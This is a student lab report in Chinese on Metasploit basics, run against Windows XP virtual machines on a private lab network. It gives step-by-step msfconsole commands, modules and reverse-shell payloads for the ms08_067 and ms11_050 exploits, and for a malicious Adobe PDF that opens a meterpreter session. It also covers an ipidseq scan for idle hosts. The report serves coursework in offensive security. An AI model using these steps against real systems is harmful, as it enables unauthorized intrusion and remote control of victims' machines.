20155307《网络对抗》MSF基础应用

实验过程

实验系统

• 所需设备：

• 靶机1：Windows XP Professional SP2 ，IP地址：192.168.1.128
• 靶机2：Windows XP Professional SP3 ，IP地址：192.168.1.133
  ~ windows XP的虚拟机安装可以在这个网址下载iso镜像，至于序列号就百度吧，会有很多。
  Kali IP地址：192.168.1.115

1、主动攻击：ms08_067

使用靶机1和Kali

• 进入msf之后，用search ms08_067查询一下针对该漏洞的攻击模块：

• 用use exploit/windows/smb/ms08_067_netapi使用该模块：

• 用show targets查看可以被攻击的靶机的操作系统型号：

• 用show payloads查看可以供我们使用的攻击载荷：

• 从中找到一个可用的攻击载荷generic/shell_reverse_tcp，用set payload generic/shell_reverse_tcp：

• 用show options查看需要设置的参数：

• 这里需要设置RHOST（靶机IP）和LHOST（Kali的IP），使用set 需设置的参数名 参数值命令即可设置：

• 设置target选项目标

• 确认参数设置无误后，用exploit指令开始攻击：

• 攻击成功后会获取靶机的shell，可以对其进行操作：

2、针对浏览器的攻击：ms11_050

使用靶机2和Kali（一开始用自己的最后会有问题，所以换了老师之前的kali）

• 用search ms11_050查询一下针对该漏洞的攻击模块，并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块：

• 用info查看该模块的信息（这个指令相当于show targets、show options等的集合版）：

基本信息：

targets信息：

options信息：

• 用set payload windows/meterpreter/reverse_tcp设置payload，并设置需要设置的参数。

• 用show options确认需要设置的参数是否已经设置好：

• 确认参数设置无误后，用exploit指令开始攻击，攻击成功后会有靶机需要访问的网址：

• 在靶机IE上输入该网址：

kali中显示session 1已经创建，并显示其会话ID：

• 输入sessions -i 1，成功获取靶机的shell，可以对其进行操作：

3、针对客户端的攻击：adobe_toolbutton

使用靶机1和Kali

• 用search adobe查询一下针对该漏洞的攻击模块：

• 选择一个模块并使用该模块：

• 用show targets查看可以被攻击的靶机的操作系统型号：

• 设置相应参数，实施exploit攻击，发现在/root/.msf4/local/目录下成功生成了一个liuhao307.pdf文件：

• 这个时候你可能在你的kali中找不到这个pdf文件，那么打开文件夹的隐藏文件显示就可以找到啦

• 将pdf文件粘贴到靶机win xp

• 在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handler，set payload windows/meterpreter/reverse_tcp，再设置IP以及端口

• 在靶机上打开刚刚那个pdf文件（这个时候可能xp没有adobe就需要下载一波，地址呢可以到这里下载），可以观察到Kali成功获取了靶机的shell，可以对其进行操作：

4、成功应用任何一个辅助模块：ipidseq

功能：扫描网段中的存活ip，它会识别被发现主机的IPID（用于跟踪IP包的次序的一种技术）序列模式，并且表示出哪些是0、随机或递增的。

• 拥有递增的IPID的空闲（空闲是指该主机在特定时间内不向网络发送数据包）主机（即显示为Incremental!的条目），不会被网络上的其它主机严重影响，可以用来进行TCP空闲扫描。

TCP空闲扫描：是一种高级的nmap扫描方式，这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

• 用show auxiliary查看所有辅助模块，并选择其中的一个，选的是scanner/ip/ipidseq：

• 查看需要设置的参数，设置完成后确认一下，这里可以进行对单一目标主机的扫描，然后就可以开始exploit了。

• 也可以对指定网段的主机进行扫描：